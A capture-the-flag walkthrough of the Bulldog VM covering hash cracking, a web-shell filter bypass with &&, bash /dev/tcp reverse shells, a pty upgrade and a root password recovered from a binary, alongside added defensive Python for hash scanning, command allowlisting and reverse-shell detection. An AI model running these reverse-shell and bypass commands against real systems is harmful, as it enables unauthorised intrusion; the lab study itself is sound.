0x00 Environment setup
Goal: get root privileges and read the flag.
Target: the VM, started in a virtual machine.
Attack machines: Kali and Win10.
Target IP problem
(1) Set NAT mode so the target is on the same network segment as Kali.
(2) If NAT is set but Kali still cannot scan the target IP, try this:
 Reboot the target to the boot menu and choose the second entry, the advanced options for Ubuntu.
 Again choose the second option.
 Select root and press Enter to drop to a command line.
 mount -o rw,remount /   (remount the root filesystem read-write)
 ifconfig -a   (shows every network card, including those that are not up)
 vim /etc/network/interfaces   (change the network card name)
 Change every interface name to the 33 one shown by ifconfig -a.
 Then scan the network segment from Kali to test.
If there is still a problem, try again.
I changed it at first but still got no response. I tried several times and still could not get it to work,
then I deleted the target files, re-imported the target and modified the IP again.
0x01 Information gathering
netdiscover -i eth0 -r 192.168.157.0/24
Port and service identification
masscan -p 1-65535 --rate=1000 192.168.157.161
nmap -A -sC -sV -p 80,23,8080 192.168.157.161 -o port.tx
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 16:34 CST
Nmap scan report for 192.168.157.161
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 00:0C:29:27:6E:D6 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.157.161

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.66 seconds
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; proto
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
OS details: Linux 3.2 - 4.9
0x02 Vulnerability discovery
Web vulnerability approach
(1) Brute-force the directories, then read the function and source code of each web page to look for holes.
(2) Check whether a CMS or other framework with known vulnerabilities is in use, so it can be exploited directly.
If a manual search with Burp (bp) finds nothing, AWVS, AppScan or Xray scans can also be started.
SSH exploitation ideas
(1) Use Hydra to try weak passwords. If a username is known, check whether its password is in the weak-password dictionary.
(2) Accounts and passwords obtained from the web application can also be tried; they are likely to be SSH passwords as well.
Step 1: browse the web directories
(1) Directory brute-forcing tools on Kali and Win10
/admin/login/ is a login box
(2) Browse the home page and click every link
There is only one link, /notice/, with no exploitable point
(3) Look at the brute-forced pages
/admin/login/ is a login box built with the Django framework
/robots.txt is useless
/dev/ has a lot of content
The useful information is:
Clicking the web shell link jumps to a page that requires authentication before it can be used.
Reviewing the /dev/ source shows password hashes that the web developer left behind for testing.
Try to crack them and log in.
<!--Need these password hashes for testing. Django's default is too complex-->
<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
Team Lead: firstname.lastname@example.org<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
Back-up Team Lead: email@example.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
Front End: firstname.lastname@example.org<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
Front End: email@example.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
Back End: firstname.lastname@example.org<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
Back End: email@example.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
Database: firstname.lastname@example.org<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
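The comment block above is exactly the kind of residue a pre-release review of the deployed HTML should catch: 40-character hex strings inside comments are unsalted SHA-1 digests, and the developers' own note says Django's default hasher (PBKDF2, salted and iterated) was replaced because it was "too complex". The following Python is an added example, not code from the write-up or from the Bulldog application. It scans an HTML fragment for digest-like hex inside comments, guesses the algorithm from the length, and shows why an unsalted SHA-1 of a dictionary word is recoverable by a simple table lookup. The HTML sample is the fragment quoted above; the wordlist is constructed for the example.

```python
import hashlib
import re

# Sample input: the /dev/ page fragment quoted in the write-up (hashes as shown there).
SAMPLE_HTML = """<!--Need these password hashes for testing. Django's default is too complex-->
<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
Team Lead: firstname.lastname@example.org<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
Back-up Team Lead: email@example.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
Front End: firstname.lastname@example.org<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
Front End: email@example.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
Back End: firstname.lastname@example.org<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
Back End: email@example.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
Database: firstname.lastname@example.org<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
"""

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
HEX_RE = re.compile(r"\b[0-9a-fA-F]{32,128}\b")
# Digest lengths (hex characters) of the common unsalted hash functions.
DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def find_hashes_in_comments(html):
    """Return (hex_digest, algorithm_guess) for every digest-like token inside an HTML comment."""
    found = []
    for comment in COMMENT_RE.findall(html):
        for token in HEX_RE.findall(comment):
            algo = DIGEST_LENGTHS.get(len(token))
            if algo:
                found.append((token.lower(), algo))
    return found


def sha1_hex(word):
    return hashlib.sha1(word.encode()).hexdigest()


def match_unsalted_sha1(hashes, wordlist):
    """Map each SHA-1 digest to the wordlist entry that produces it, if any.

    With no salt, one precomputed table serves every hash at once, which is
    why online lookup services answer these instantly.
    """
    table = {sha1_hex(w): w for w in wordlist}
    return {h: table[h] for h, algo in hashes if algo == "SHA-1" and h in table}


if __name__ == "__main__":
    leaked = find_hashes_in_comments(SAMPLE_HTML)
    for digest, algo in leaked:
        print(f"{algo:8} {digest}")
    # Constructed mini wordlist for the demonstration (the two words the write-up recovers).
    wordlist = ["password", "bulldog", "bulldoglover", "admin"]
    print("recovered:", match_unsalted_sha1(leaked, wordlist))
```

Running the module prints the seven SHA-1 digests and whichever of them the constructed wordlist reproduces. The defensive fix is the one the comment itself rejected: keep Django's default PBKDF2 hasher (salt plus a high iteration count), and never ship test credentials, hashed or not, in page markup.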
Step 2: crack the hashes
Finally, two of the passwords are recovered by online lookup:
Password: bulldog (cmd5)
Password: bulldoglover (somd5)
Step 3: log in to the admin backend with the passwords
(1) Logging in with the part of the mailbox before the @ as the username and the recovered password shows that the account has no permission to do anything.
(2) SSH login on port 23 fails.
(3) Recall the web shell that required authentication a moment ago.
After successful authentication it is a command-execution interface.
Step 4: execute commands (try bypass methods)
Testing shows that many commands are blocked by the web page, so try to bypass the filter.
Testing shows that chaining an allowed command with && and a disallowed one gets through:
id alone is not executed
ls && id is executed
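The chaining bypass works because a filter that only looks at the command name, and then hands the whole string to a shell, has no idea what && means. The Python below is an added example, not the write-up's code and not the Bulldog application's filter (which the page does not show); it reconstructs such a weak check as a hypothetical `weak_filter` and puts the hardened form beside it: reject shell metacharacters, tokenize with `shlex`, enforce an allowlist on the program name, and execute an argv list so no shell ever parses the input. `ALLOWED_COMMANDS` is an assumed allowlist.

```python
import shlex
import subprocess

# Hypothetical allowlist of the kind a "network tools" web shell might ship with;
# the real application's list is not shown in the write-up.
ALLOWED_COMMANDS = {"ifconfig", "ping", "ls", "whoami", "pwd", "uptime"}
# Characters that let a shell chain, pipe, substitute or redirect.
SHELL_METACHARS = set("&|;`$<>(){}\n\r")


def weak_filter(cmdline):
    """Flawed check (reconstructed, not the application's code): validates only the
    first word, after which the caller passes the whole string to /bin/sh.
    'id' is refused, but 'ls && id' passes and the shell then runs both commands."""
    words = cmdline.strip().split()
    return bool(words) and words[0] in ALLOWED_COMMANDS


def hardened_parse(cmdline):
    """Hardened check: refuse shell metacharacters outright, tokenize without a shell,
    and require the program name to be on the allowlist. Returns argv or raises."""
    bad = sorted(ch for ch in set(cmdline) if ch in SHELL_METACHARS)
    if bad:
        raise ValueError(f"shell metacharacters not allowed: {bad!r}")
    argv = shlex.split(cmdline)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise ValueError("command not on allowlist")
    return argv


def is_accepted_hardened(cmdline):
    try:
        hardened_parse(cmdline)
        return True
    except ValueError:
        return False


def run_hardened(cmdline, timeout=5):
    """Execute an allowlisted command as an argv list; no shell is ever involved,
    so && and friends are ordinary (and already rejected) characters."""
    argv = hardened_parse(cmdline)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).stdout


if __name__ == "__main__":
    for probe in ("id", "ls && id", "ls -la /tmp", "ls $(id)"):
        print(f"{probe!r:16} weak={weak_filter(probe)!s:5} hardened={is_accepted_hardened(probe)}")
    print(run_hardened("pwd").strip())
```

The weak and hardened checks disagree exactly on the chained input: `weak_filter` accepts `ls && id` because `ls` is allowed, while `hardened_parse` rejects it before any tokenizing because of the `&` characters. Logging rejected inputs from the hardened path also gives a clean detection signal for this kind of probing.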
Step 5: reverse shell
(1) Chain the reverse shell after an allowed command:
ls && bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8080 <&1'
(2) echo can also be used directly to launch the reverse shell:
echo "bash -i >& /dev/tcp/192.168.157.137/8080 0>&1" | bash
First echo the command, then pipe it into bash.
Both methods successfully spawn a reverse shell.
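Both variants above, and the later pty upgrade, leave distinctive command lines in process-execution telemetry (auditd execve records, EDR process events). The Python below is an added detection example, not code from the write-up: it classifies command lines by three indicators, a `/dev/tcp` or `/dev/udp` redirect with the remote ip:port extracted, an interactive shell flag (`bash -i`), and a `pty.spawn` upgrade. The sample lines are constructed from the commands in this write-up, not captured data.

```python
import re

# Constructed sample of process command lines, modelled on this write-up's commands
# (the shape one would see in auditd execve records); not real captured data.
SAMPLE_CMDLINES = [
    "bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8080 <&1'",
    "bash -c \"bash -i >& /dev/tcp/192.168.157.137/8080 0>&1\"",
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "ls -la /home/bulldogadmin",
]

# bash's /dev/tcp/<host>/<port> pseudo-device (no binary needed, so file-based IOCs miss it).
DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
# An interactive shell started from a non-interactive context.
INTERACTIVE_SHELL_RE = re.compile(r"\b(?:ba|z|da)?sh\s+-i\b")
# The tty upgrade used once a reverse shell is in hand.
PTY_SPAWN_RE = re.compile(r"pty\.spawn\s*\(")


def classify(cmdline):
    """Return a list of (indicator, detail) tuples for one command line."""
    findings = []
    m = DEV_TCP_RE.search(cmdline)
    if m:
        findings.append(("dev_tcp_redirect", f"{m.group(1)}://{m.group(2)}:{m.group(3)}"))
    if INTERACTIVE_SHELL_RE.search(cmdline):
        findings.append(("interactive_shell_flag", "-i"))
    if PTY_SPAWN_RE.search(cmdline):
        findings.append(("tty_upgrade", "pty.spawn"))
    return findings


def scan(cmdlines):
    """Map line index -> findings for every line that triggers at least one indicator."""
    return {i: f for i, f in ((i, classify(c)) for i, c in enumerate(cmdlines)) if f}


def remote_endpoints(cmdlines):
    """Distinct ip:port endpoints referenced through /dev/tcp or /dev/udp, for blocking or pivoting the investigation."""
    return sorted({
        detail.split("://", 1)[1]
        for findings in scan(cmdlines).values()
        for kind, detail in findings
        if kind == "dev_tcp_redirect"
    })


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_CMDLINES).items():
        print(idx, SAMPLE_CMDLINES[idx])
        for kind, detail in findings:
            print("   ", kind, detail)
    print("endpoints:", remote_endpoints(SAMPLE_CMDLINES))
```

The benign `ls` line produces no findings; the two reverse-shell lines each yield both the redirect and the `-i` flag, and the endpoint list collapses them to the single `192.168.157.137:8080` the write-up uses. A useful parent-process condition in production is that the shell was spawned by the web server's worker (here the Python WSGI process), which is exactly the chain this web shell creates.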
0x03 Privilege escalation
Step 6: check the system users and decide which ones deserve attention
Two users have /bin/bash: django and bulldogadmin
Step 7: look for each user's files
(1) Look at bulldogadmin first
find / -user bulldogadmin 2>/dev/null
Show only the non-error output
(2>/dev/null redirects standard error to /dev/null, the Linux null device commonly called a black hole)
(2) Two files are found in a hidden directory
(3) The note file should be a text file; cat prints it directly
(4) The app looks like an executable; run strings on it to print its printable characters and take a look
Step 8: splice together the root password and escalate
These could be a password.
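What strings(1) does is simple enough to reimplement, and doing so shows why a hard-coded secret in a binary is no secret, even when it is stored in two halves that have to be spliced. The Python below is an added example, not the write-up's code and not the target's application; it extracts printable runs from a byte buffer the way strings does (runs of at least four printable ASCII bytes), flags any that contain credential-like keywords, and joins neighbouring runs so a password split across two adjacent string literals can be spotted. The byte buffer is constructed for the example around the two fragments named in this write-up.

```python
import re

# Constructed sample "binary": the two password fragments the write-up recovers,
# stored as adjacent NUL-terminated literals among other bytes. Not the real app.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"SUPERultimate\x00" + b"\x01\x02" + b"PASSWORDyouCANTget\x00"
    + b"\x90" * 8 + b"ok\x00" + b"/bin/sh\x00"
)

# Keywords that make a printable run worth a second look during a pre-release review.
CREDENTIAL_HINT_RE = re.compile(r"(?i)pass|pwd|secret|token|key|cred")


def extract_strings(data, min_len=4):
    """Printable ASCII runs of at least min_len bytes, in file order (what strings(1) prints)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_credential_like(data, min_len=4):
    """Runs that mention a credential-related keyword."""
    return [s for s in extract_strings(data, min_len) if CREDENTIAL_HINT_RE.search(s)]


def splice_neighbors(strings):
    """Concatenate each run with the one that follows it: secrets split across two
    adjacent literals (as in the write-up's 'splicing' step) show up whole here."""
    return [a + b for a, b in zip(strings, strings[1:])]


if __name__ == "__main__":
    runs = extract_strings(SAMPLE_BINARY)
    print("strings:", runs)
    print("credential-like:", find_credential_like(SAMPLE_BINARY))
    print("spliced neighbours:", splice_neighbors(runs))
```

On the constructed buffer the keyword filter flags only the second fragment, which is why splicing adjacent runs is worth doing: the full `SUPERultimatePASSWORDyouCANTget` appears only in the joined list. The mitigation is not to hide the string better but not to embed it: a setuid helper that needs a privileged action should check the caller's identity or a capability, not compare against a baked-in password.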
su reports: must be run from a terminal
Convert the shell to a fully interactive tty with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
su still errors with: Authentication failure
sudo su
(password: SUPERultimatePASSWORDyouCANTget)
cd ..
cat congrats.txt
0x04 Summary of the approach
1. Use directory brute-forcing; in the brute-forced /dev/ page content find the web shell page, and read the account and password needed for authentication from the source.
2. The web shell page can execute operating-system commands, but a direct bash reverse shell is blocked. Find a bypass: either echo the command first and pipe it into bash, or chain it as in ls && id.
3. After getting the shell, go back through the files for clues such as passwords.
4. The su command errors with "must be run from a terminal". If a Python environment is available,
python -c 'import pty;pty.spawn("/bin/bash")'
converts the shell to terminal (tty) mode.